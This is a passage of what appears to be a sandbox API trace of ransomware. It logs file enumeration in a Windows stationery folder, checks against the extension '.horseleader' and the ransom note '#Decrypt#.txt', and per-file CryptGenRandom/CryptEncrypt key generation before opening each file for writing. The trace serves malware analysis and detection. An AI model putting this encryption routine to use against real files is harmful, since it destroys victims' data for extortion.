(in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.758] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf" (normalized: "c:\\program files\\common 
files\\microsoft shared\\stationery\\grid_(cm).wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.758] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4fa397f, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4fa397f, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44692a69, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1d4a, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="grid_(inch).wmf", cAlternateFileName="")) returned 1 [0245.758] lstrcmpiW (lpString1="grid_(inch).wmf", lpString2="Windows") returned -1 [0245.758] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 77 [0245.759] StrStrIW (lpFirst="grid_(inch).wmf", lpSrch=".horseleader") returned 0x0 [0245.759] lstrcmpW (lpString1="grid_(inch).wmf", lpString2="#Decrypt#.txt") returned 1 [0245.759] lstrcmpW (lpString1="grid_(inch).wmf", lpString2="_uninstalling_.png") returned 1 [0245.759] lstrlenW (lpString=".testttjffg") returned 11 [0245.759] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf", lpSrch=".testttjffg") returned 0x0 [0245.759] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.759] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.759] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf" (normalized: "c:\\program files\\common 
files\\microsoft shared\\stationery\\grid_(inch).wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.759] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce31efaf, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce31efaf, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce0bd9df, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xeb, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Hand Prints.htm", cAlternateFileName="")) returned 1 [0245.759] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="Windows") returned -1 [0245.759] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 77 [0245.760] StrStrIW (lpFirst="Hand Prints.htm", lpSrch=".horseleader") returned 0x0 [0245.760] lstrcmpW (lpString1="Hand Prints.htm", lpString2="#Decrypt#.txt") returned 1 [0245.760] lstrcmpW (lpString1="Hand Prints.htm", lpString2="_uninstalling_.png") returned 1 [0245.760] lstrlenW (lpString=".testttjffg") returned 11 [0245.760] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", lpSrch=".testttjffg") returned 0x0 [0245.760] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.760] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.760] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common 
files\\microsoft shared\\stationery\\hand prints.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.761] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce31efaf, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce31efaf, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa45cbf3, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x107e, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="HandPrints.jpg", cAlternateFileName="")) returned 1 [0245.761] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="Windows") returned -1 [0245.761] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 76 [0245.761] StrStrIW (lpFirst="HandPrints.jpg", lpSrch=".horseleader") returned 0x0 [0245.761] lstrcmpW (lpString1="HandPrints.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.762] lstrcmpW (lpString1="HandPrints.jpg", lpString2="_uninstalling_.png") returned 1 [0245.762] lstrlenW (lpString=".testttjffg") returned 11 [0245.762] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", lpSrch=".testttjffg") returned 0x0 [0245.762] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.762] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.762] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft 
shared\\stationery\\handprints.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.762] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5192b38, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5192b38, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4480f815, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x252ec, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Memo.emf", cAlternateFileName="")) returned 1 [0245.762] lstrcmpiW (lpString1="Memo.emf", lpString2="Windows") returned -1 [0245.762] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 70 [0245.763] StrStrIW (lpFirst="Memo.emf", lpSrch=".horseleader") returned 0x0 [0245.763] lstrcmpW (lpString1="Memo.emf", lpString2="#Decrypt#.txt") returned 1 [0245.763] lstrcmpW (lpString1="Memo.emf", lpString2="_uninstalling_.png") returned 1 [0245.763] lstrlenW (lpString=".testttjffg") returned 11 [0245.763] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf", lpSrch=".testttjffg") returned 0x0 [0245.763] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.763] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.763] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\memo.emf"), dwDesiredAccess=0xc0000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.764] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4e4cd3a, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4e4cd3a, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44835973, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x8a1, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Monet.jpg", cAlternateFileName="")) returned 1 [0245.764] lstrcmpiW (lpString1="Monet.jpg", lpString2="Windows") returned -1 [0245.764] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 71 [0245.764] StrStrIW (lpFirst="Monet.jpg", lpSrch=".horseleader") returned 0x0 [0245.764] lstrcmpW (lpString1="Monet.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.764] lstrcmpW (lpString1="Monet.jpg", lpString2="_uninstalling_.png") returned 1 [0245.764] lstrlenW (lpString=".testttjffg") returned 11 [0245.764] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", lpSrch=".testttjffg") returned 0x0 [0245.764] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.764] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.764] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.765] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc51dedf2, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc51dedf2, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x448cdeeb, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1060, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Month_Calendar.emf", cAlternateFileName="")) returned 1 [0245.765] lstrcmpiW (lpString1="Month_Calendar.emf", lpString2="Windows") returned -1 [0245.765] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 80 [0245.765] StrStrIW (lpFirst="Month_Calendar.emf", lpSrch=".horseleader") returned 0x0 [0245.765] lstrcmpW (lpString1="Month_Calendar.emf", lpString2="#Decrypt#.txt") returned 1 [0245.765] lstrcmpW (lpString1="Month_Calendar.emf", lpString2="_uninstalling_.png") returned 1 [0245.765] lstrlenW (lpString=".testttjffg") returned 11 [0245.765] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf", lpSrch=".testttjffg") returned 0x0 [0245.765] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.765] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.765] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\month_calendar.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.765] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc522b0ac, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc522b0ac, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x448cdeeb, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x65b4, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Music.emf", cAlternateFileName="")) returned 1 [0245.765] lstrcmpiW (lpString1="Music.emf", lpString2="Windows") returned -1 [0245.766] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf") returned 71 [0245.766] StrStrIW (lpFirst="Music.emf", lpSrch=".horseleader") returned 0x0 [0245.766] lstrcmpW (lpString1="Music.emf", lpString2="#Decrypt#.txt") returned 1 [0245.766] lstrcmpW (lpString1="Music.emf", lpString2="_uninstalling_.png") returned 1 [0245.766] lstrlenW (lpString=".testttjffg") returned 11 [0245.766] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf", lpSrch=".testttjffg") returned 0x0 [0245.766] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.766] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.766] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\music.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.767] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4ebf151, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4ebf151, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44b2f4cb, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xb86, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Notebook.jpg", cAlternateFileName="")) returned 1 [0245.767] lstrcmpiW (lpString1="Notebook.jpg", lpString2="Windows") returned -1 [0245.767] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg") returned 74 [0245.767] StrStrIW (lpFirst="Notebook.jpg", lpSrch=".horseleader") returned 0x0 [0245.767] lstrcmpW (lpString1="Notebook.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.767] lstrcmpW (lpString1="Notebook.jpg", lpString2="_uninstalling_.png") returned 1 [0245.767] lstrlenW (lpString=".testttjffg") returned 11 [0245.768] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg", lpSrch=".testttjffg") returned 0x0 [0245.768] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.768] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.768] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xffffffff [0245.769] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce31efaf, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce31efaf, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce0e3b3c, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Orange Circles.htm", cAlternateFileName="")) returned 1 [0245.769] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="Windows") returned -1 [0245.769] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm") returned 80 [0245.769] StrStrIW (lpFirst="Orange Circles.htm", lpSrch=".horseleader") returned 0x0 [0245.769] lstrcmpW (lpString1="Orange Circles.htm", lpString2="#Decrypt#.txt") returned 1 [0245.769] lstrcmpW (lpString1="Orange Circles.htm", lpString2="_uninstalling_.png") returned 1 [0245.769] lstrlenW (lpString=".testttjffg") returned 11 [0245.769] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm", lpSrch=".testttjffg") returned 0x0 [0245.769] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.769] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.769] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.769] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce34510c, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce34510c, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa4cf00d, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x18ed, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="OrangeCircles.jpg", cAlternateFileName="")) returned 1 [0245.769] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="Windows") returned -1 [0245.769] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg") returned 79 [0245.770] StrStrIW (lpFirst="OrangeCircles.jpg", lpSrch=".horseleader") returned 0x0 [0245.770] lstrcmpW (lpString1="OrangeCircles.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.770] lstrcmpW (lpString1="OrangeCircles.jpg", lpString2="_uninstalling_.png") returned 1 [0245.770] lstrlenW (lpString=".testttjffg") returned 11 [0245.770] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg", lpSrch=".testttjffg") returned 0x0 [0245.770] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.770] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.770] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.770] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce34510c, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce34510c, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce109c99, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xe8, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Peacock.htm", cAlternateFileName="")) returned 1 [0245.770] lstrcmpiW (lpString1="Peacock.htm", lpString2="Windows") returned -1 [0245.770] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.htm") returned 73 [0245.770] StrStrIW (lpFirst="Peacock.htm", lpSrch=".horseleader") returned 0x0 [0245.770] lstrcmpW (lpString1="Peacock.htm", lpString2="#Decrypt#.txt") returned 1 [0245.770] lstrcmpW (lpString1="Peacock.htm", lpString2="_uninstalling_.png") returned 1 [0245.770] lstrlenW (lpString=".testttjffg") returned 11 [0245.770] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.htm", lpSrch=".testttjffg") returned 0x0 [0245.770] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.771] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.771] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.772] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce3913c6, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce3913c6, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa51b2c9, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x13fb, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Peacock.jpg", cAlternateFileName="")) returned 1 [0245.772] lstrcmpiW (lpString1="Peacock.jpg", lpString2="Windows") returned -1 [0245.772] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg") returned 73 [0245.772] StrStrIW (lpFirst="Peacock.jpg", lpSrch=".horseleader") returned 0x0 [0245.772] lstrcmpW (lpString1="Peacock.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.772] lstrcmpW (lpString1="Peacock.jpg", lpString2="_uninstalling_.png") returned 1 [0245.772] lstrlenW (lpString=".testttjffg") returned 11 [0245.772] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg", lpSrch=".testttjffg") returned 0x0 [0245.772] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.772] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.772] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 
returned 0xffffffff [0245.773] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4f0b40b, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4f0b40b, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44b55629, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xf8d, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Pine_Lumber.jpg", cAlternateFileName="")) returned 1 [0245.773] lstrcmpiW (lpString1="Pine_Lumber.jpg", lpString2="Windows") returned -1 [0245.773] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg") returned 77 [0245.773] StrStrIW (lpFirst="Pine_Lumber.jpg", lpSrch=".horseleader") returned 0x0 [0245.773] lstrcmpW (lpString1="Pine_Lumber.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.773] lstrcmpW (lpString1="Pine_Lumber.jpg", lpString2="_uninstalling_.png") returned 1 [0245.773] lstrlenW (lpString=".testttjffg") returned 11 [0245.773] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg", lpSrch=".testttjffg") returned 0x0 [0245.773] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, 